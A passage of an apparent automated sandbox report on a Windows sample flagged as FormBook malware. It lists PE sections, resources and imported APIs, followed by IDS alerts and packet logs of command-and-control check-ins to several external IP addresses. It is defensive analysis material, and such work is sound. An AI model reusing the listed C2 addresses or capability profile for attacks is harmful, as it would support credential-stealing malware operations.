                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0xd40000x5d37c0x5d400aaf0a83192f29627e1716016cd081f7aFalse0.9707345425603218data7.96880676518361IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x1320000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0xd44580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                    RT_ICON0xd45800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                    RT_ICON0xd46a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                    RT_ICON0xd47d00x1024Device independent bitmap graphic, 32 x 62 x 32, image size 3968, resolution 4724 x 4724 px/mEnglishGreat Britain0.23426911907066797
                                                    RT_MENU0xd57f40x50dataEnglishGreat Britain0.9
                                                    RT_STRING0xd58440x594dataEnglishGreat Britain0.3333333333333333
                                                    RT_STRING0xd5dd80x68adataEnglishGreat Britain0.2735961768219833
                                                    RT_STRING0xd64640x490dataEnglishGreat Britain0.3715753424657534
                                                    RT_STRING0xd68f40x5fcdataEnglishGreat Britain0.3087467362924282
                                                    RT_STRING0xd6ef00x65cdataEnglishGreat Britain0.34336609336609336
                                                    RT_STRING0xd754c0x466dataEnglishGreat Britain0.3605683836589698
                                                    RT_STRING0xd79b40x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                    RT_RCDATA0xd7b0c0x59354data1.0003311475768755
                                                    RT_GROUP_ICON0x130e600x14dataEnglishGreat Britain1.2
                                                    RT_GROUP_ICON0x130e740x14dataEnglishGreat Britain1.25
                                                    RT_GROUP_ICON0x130e880x14dataEnglishGreat Britain1.15
                                                    RT_GROUP_ICON0x130e9c0x14dataEnglishGreat Britain1.25
                                                    RT_VERSION0x130eb00xdcdataEnglishGreat Britain0.6181818181818182
                                                    RT_MANIFEST0x130f8c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                    Imports

                                                    DLLImport
                                                    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                    PSAPI.DLLGetProcessMemoryInfo
                                                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                    UxTheme.dllIsThemeActive
                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                    USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                    GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                    SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                    OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishGreat Britain

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                    2024-08-05T15:33:46.610247+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M25543880192.168.2.476.223.67.189
                                                    2024-08-05T15:30:29.366717+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M25544680192.168.2.4116.213.43.190
                                                    2024-08-05T15:32:44.348060+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35541980192.168.2.464.226.69.42
                                                    2024-08-05T15:32:24.598271+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M25541480192.168.2.4109.95.158.127
                                                    2024-08-05T15:34:41.642470+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35544580192.168.2.4116.213.43.190
                                                    2024-08-05T15:33:11.869360+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35542780192.168.2.4216.83.33.140
                                                    2024-08-05T15:33:33.481112+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M25543480192.168.2.435.241.42.217
                                                    2024-08-05T15:31:37.858823+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35540080192.168.2.438.12.1.29
                                                    2024-08-05T15:34:06.742130+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35544180192.168.2.4116.213.43.190
                                                    2024-08-05T15:32:32.758756+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35541680192.168.2.43.33.130.190
                                                    2024-08-05T15:31:48.976689+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35540380192.168.2.4217.116.0.191
                                                    2024-08-05T15:33:14.394961+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35542880192.168.2.4216.83.33.140
                                                    2024-08-05T15:32:11.243024+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M25541080192.168.2.43.33.130.190
                                                    2024-08-05T15:33:44.056357+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35543780192.168.2.476.223.67.189
                                                    2024-08-05T15:33:41.525809+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35543680192.168.2.476.223.67.189
                                                    2024-08-05T15:31:42.990832+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M25540280192.168.2.438.12.1.29
                                                    2024-08-05T15:34:36.179851+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35544380192.168.2.4116.213.43.190
                                                    2024-08-05T15:33:25.855659+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35543180192.168.2.435.241.42.217
                                                    2024-08-05T15:32:46.883713+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35542080192.168.2.464.226.69.42
                                                    2024-08-05T15:34:29.154258+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M25544280192.168.2.4116.213.43.190
                                                    2024-08-05T15:33:16.945128+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35542980192.168.2.4216.83.33.140
                                                    2024-08-05T15:32:57.776739+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35542380192.168.2.4203.161.55.102
                                                    2024-08-05T15:32:51.923298+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M25542280192.168.2.464.226.69.42
                                                    2024-08-05T15:33:00.271451+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35542480192.168.2.4203.161.55.102
                                                    2024-08-05T15:31:57.075925+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M25540680192.168.2.4217.116.0.191
                                                    2024-08-05T15:33:02.853794+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35542580192.168.2.4203.161.55.102
                                                    2024-08-05T15:32:30.095906+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35541580192.168.2.43.33.130.190
                                                    2024-08-05T15:31:54.186142+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35540580192.168.2.4217.116.0.191
                                                    2024-08-05T15:31:51.526601+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35540480192.168.2.4217.116.0.191
                                                    2024-08-05T15:33:05.338981+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M25542680192.168.2.4203.161.55.102
                                                    2024-08-05T15:34:38.715086+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35544480192.168.2.4116.213.43.190
                                                    2024-08-05T15:32:35.190410+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35541780192.168.2.43.33.130.190
                                                    2024-08-05T15:34:04.213661+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35544080192.168.2.4116.213.43.190
                                                    2024-08-05T15:32:07.823386+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35540980192.168.2.43.33.130.190
                                                    2024-08-05T15:31:40.563497+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35540180192.168.2.438.12.1.29
                                                    2024-08-05T15:34:01.680859+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35543980192.168.2.4116.213.43.190
                                                    2024-08-05T15:32:38.674646+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M25541880192.168.2.43.33.130.190
                                                    2024-08-05T15:33:19.469697+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M25543080192.168.2.4216.83.33.140
                                                    2024-08-05T15:32:16.991396+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35541180192.168.2.4109.95.158.127
                                                    2024-08-05T15:33:38.983279+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35543580192.168.2.476.223.67.189
                                                    2024-08-05T15:31:35.346636+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35539980192.168.2.438.12.1.29
                                                    2024-08-05T15:33:30.940025+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35543380192.168.2.435.241.42.217
                                                    2024-08-05T15:32:19.546018+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35541280192.168.2.4109.95.158.127
                                                    2024-08-05T15:32:22.070909+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35541380192.168.2.4109.95.158.127
                                                    2024-08-05T15:31:17.205288+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M25539780192.168.2.43.33.130.190
                                                    2024-08-05T15:32:05.273764+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35540880192.168.2.43.33.130.190
                                                    2024-08-05T15:32:02.700047+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35540780192.168.2.43.33.130.190
                                                    2024-08-05T15:32:49.398527+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35542180192.168.2.464.226.69.42
                                                    2024-08-05T15:33:28.389390+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M35543280192.168.2.435.241.42.217

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Aug 5, 2024 15:31:16.697523117 CEST5539780192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:31:16.702527046 CEST80553973.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:31:16.702611923 CEST5539780192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:31:16.704848051 CEST5539780192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:31:16.709692001 CEST80553973.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:31:17.205013990 CEST80553973.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:31:17.205123901 CEST80553973.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:31:17.205287933 CEST5539780192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:31:17.208636999 CEST5539780192.168.2.43.33.130.190
                                                    Aug 5, 2024 15:31:17.218489885 CEST80553973.33.130.190192.168.2.4
                                                    Aug 5, 2024 15:31:34.448457956 CEST5539980192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:34.453433990 CEST805539938.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:34.453572035 CEST5539980192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:34.455704927 CEST5539980192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:34.460547924 CEST805539938.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:35.346323013 CEST805539938.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:35.346447945 CEST805539938.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:35.346636057 CEST5539980192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:35.966180086 CEST5539980192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:36.984570980 CEST5540080192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:36.989576101 CEST805540038.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:36.993746996 CEST5540080192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:36.995434046 CEST5540080192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:37.000335932 CEST805540038.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:37.858598948 CEST805540038.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:37.858755112 CEST805540038.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:37.858823061 CEST5540080192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:38.507493973 CEST5540080192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:39.525800943 CEST5540180192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:39.577769041 CEST805540138.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:39.578133106 CEST5540180192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:39.580959082 CEST5540180192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:39.585905075 CEST805540138.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:39.585921049 CEST805540138.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:39.585928917 CEST805540138.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:39.585942030 CEST805540138.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:39.585963011 CEST805540138.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:39.586035013 CEST805540138.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:39.586046934 CEST805540138.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:39.587239027 CEST805540138.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:39.587250948 CEST805540138.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:40.562031031 CEST805540138.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:40.563420057 CEST805540138.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:40.563497066 CEST5540180192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:41.085958004 CEST5540180192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:42.104713917 CEST5540280192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:42.109690905 CEST805540238.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:42.109786034 CEST5540280192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:42.111552954 CEST5540280192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:42.116389036 CEST805540238.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:42.990638018 CEST805540238.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:42.990756989 CEST805540238.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:42.990832090 CEST5540280192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:42.993993044 CEST5540280192.168.2.438.12.1.29
                                                    Aug 5, 2024 15:31:42.998895884 CEST805540238.12.1.29192.168.2.4
                                                    Aug 5, 2024 15:31:48.291944981 CEST5540380192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:48.298114061 CEST8055403217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:48.298234940 CEST5540380192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:48.299766064 CEST5540380192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:48.304711103 CEST8055403217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:48.976499081 CEST8055403217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:48.976519108 CEST8055403217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:48.976689100 CEST5540380192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:49.804614067 CEST5540380192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:50.830182076 CEST5540480192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:50.838589907 CEST8055404217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:50.838701963 CEST5540480192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:50.840605974 CEST5540480192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:50.846204042 CEST8055404217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:51.526330948 CEST8055404217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:51.526360989 CEST8055404217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:51.526601076 CEST5540480192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:52.351299047 CEST5540480192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:53.374205112 CEST5540580192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:53.379189968 CEST8055405217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:53.379322052 CEST5540580192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:53.384526968 CEST5540580192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:53.389436960 CEST8055405217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:53.389448881 CEST8055405217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:53.389457941 CEST8055405217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:53.389468908 CEST8055405217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:53.389477968 CEST8055405217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:53.389539957 CEST8055405217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:53.389549971 CEST8055405217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:53.389568090 CEST8055405217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:53.389578104 CEST8055405217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:54.185596943 CEST8055405217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:54.186047077 CEST8055405217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:54.186141968 CEST5540580192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:54.898123026 CEST5540580192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:55.916939974 CEST5540680192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:56.251333952 CEST8055406217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:56.251497984 CEST5540680192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:56.253350019 CEST5540680192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:56.259661913 CEST8055406217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:57.075639009 CEST8055406217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:57.075690031 CEST8055406217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:57.075793982 CEST8055406217.116.0.191192.168.2.4
                                                    Aug 5, 2024 15:31:57.075925112 CEST5540680192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:57.075958967 CEST5540680192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:57.078430891 CEST5540680192.168.2.4217.116.0.191
                                                    Aug 5, 2024 15:31:57.084598064 CEST8055406217.116.0.191192.168.2.4
